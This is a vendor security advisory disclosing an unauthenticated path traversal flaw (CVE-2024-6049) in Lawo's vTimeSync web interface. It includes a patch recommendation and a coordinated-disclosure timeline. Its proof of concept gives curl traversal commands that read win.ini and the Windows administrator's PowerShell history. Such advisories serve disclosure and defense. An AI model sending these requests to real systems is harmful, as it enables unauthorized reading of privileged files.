Unauthenticated Path Traversal Vulnerability in Lawo AG vsm LTC Time Sync (vTimeSync)


Unauthenticated Path Traversal Vulnerability


Lawo AG vsm LTC Time Sync (vTimeSync)

Vulnerable Version


Fixed Version

CVE Number







Sandro Einfeldt, Dennis Jung | SEC Consult Vulnerability Lab

The web interface of Lawo AG vsm LTC Time Sync (vTimeSync) was vulnerable to a path traversal vulnerability. By sending a specially crafted HTTP request, an unauthenticated remote attacker could download arbitrary files from the vulnerable system. As a limitation, the exploitation was only possible if the requested file has a file extension, e. g. .exe or .txt.

Vendor description

"Lawo designs and manufactures video, audio, control and monitoring technology for broadcast, performing arts, installed sound and corporate applications. All products are developed in Germany and manufactured according to highest quality standards at the company's headquarters in the Rhine valley town of Rastatt, Germany."

Source: lawo.com/company/about-us/&nbsp;  

Business recommendation

The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues.

Vulnerability overview/description

1) Unauthenticated Path Traversal Vulnerability (CVE-2024-6049)

The web interface of vsm LTC Time Sync (vTimeSync) is vulnerable to a path traversal vulnerability. By sending a specially crafted HTTP request, an unauthenticated remote attacker can download arbitrary files from the vulnerable system. As a limitation, the exploitation is only possible if the requested file has a file extension, e.g. .exe or .txt.

The web server is running with highest SYSTEM privileges per default, which enables an attacker to gain access to privileged files.

Proof of concept

1) Unauthenticated Path Traversal Vulnerability (CVE-2024-6049)

To exploit the vulnerability it is sufficient to use the following curl-command to send a request to the vulnerable web server:

curl http:// $host:8033/.../.../.../.../.../.../.../.../.../<Path to file>

For example, the following command can be used to request the default file win.ini:

curl http:// $host:8033/.../.../.../.../.../.../.../.../.../Windows/win.ini

If the application is running with SYSTEM-privileges (default), the following command can be used to exfiltrate the Powershell history of the Windows administrator, which might leak sensitive information:

curl http:// $host:8033/.../.../.../.../.../.../.../.../.../Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt

Vulnerable / tested versions

The following version has been tested which was the latest version available at the time of the test:


According to the vendor, versions before 4.5 are affected and v4.5.6.0 includes the fixes.

Vendor contact timeline

2024-01-22 Contacting vendor through info@lawo.com; no response
2024-02-14 Contacting vendor again, adding support@lawo.com email
2024-02-15 Vendor response (support), asking for details.
2024-02-15 Asking where to submit the advisory, whether encryption is supported.
2024-02-16 Vendor, submit either via email or JIRA; informing us that broadcasting software security levels are not that high as the network is usually not connected to the outside.
2024-02-16 Submitting security advisory to vendor JIRA; explaining our severity estimation and risks by exposing the affected service.
2024-02-20 Vendor has taken a look at the advisory, asking whether HTTPS would solve the issue. Telling vendor, that HTTPS won't fix the problem, describing the security issue again, providing link to OWASP path traversal page, etc.
2024-02-21 Vendor cannot reproduce issue in Chrome browser. Explaining how we exploited the vulnerability.
2024-03-11 Asking for a status update; no update from R&D yet, vendor will keep us updated.
2024-04-09 Asking for a status update, whether vendor needs further support.
2024-04-10 Vendor pinged their PM, will let us know as soon as feedback is available.
2024-05-15 Vendor recently introduced "a login" for vTimeSync which only lets people with a username and a PW access the page. Vendor asks us whether this would cover the vulnerability.
2024-05-23 Telling the vendor that a login does not fix the identified path traversal issue; no response.
2024-06-17 Asking for a status update again.
2024-06-17 Vendor support has forwarded our feedback internally.
2024-09-25 Asking for a status update, CVE and affected/fixed version number. Preparing for release in October.
2024-09-25 Vendor support still has no updates, asking product management and RnD team again.
2024-09-26 Asking the vendor to keep us informed.
2024-09-27 Vendor support will review the case next Wednesday.
2024-10-10 Asking for a status update. Vendor has no news, this topic is in the R&D backlog, no date yet when development will be started.
2024-10-11 Vendor states that the developers have already fixed the issue in the current release.
2024-10-17 Asking for the version numbers (affected / patched). Vendor provides download to version including changelog. Changelog contains information about security fix in version 4.4.13, but also changes regarding SSL/HTTPS and logon feature in 4.5.0 and 4.5.1. Asking the vendor again, in which version the issue has been fixed. Vendor informs us the problem is fixed after v4.5 and we should use the latest version.
2024-10-21 Confirming version numbers, sending draft advisory to vendor and assigned CVE-2024-6049.
2024-10-24 Coordinated release of security advisory.


The vendor provides a patch in versions after v4.5 which can be downloaded from the following URL, such as version



Advisory URL



EOF Sandro Einfeldt, Dennis Jung, Johannes Greil / @2024

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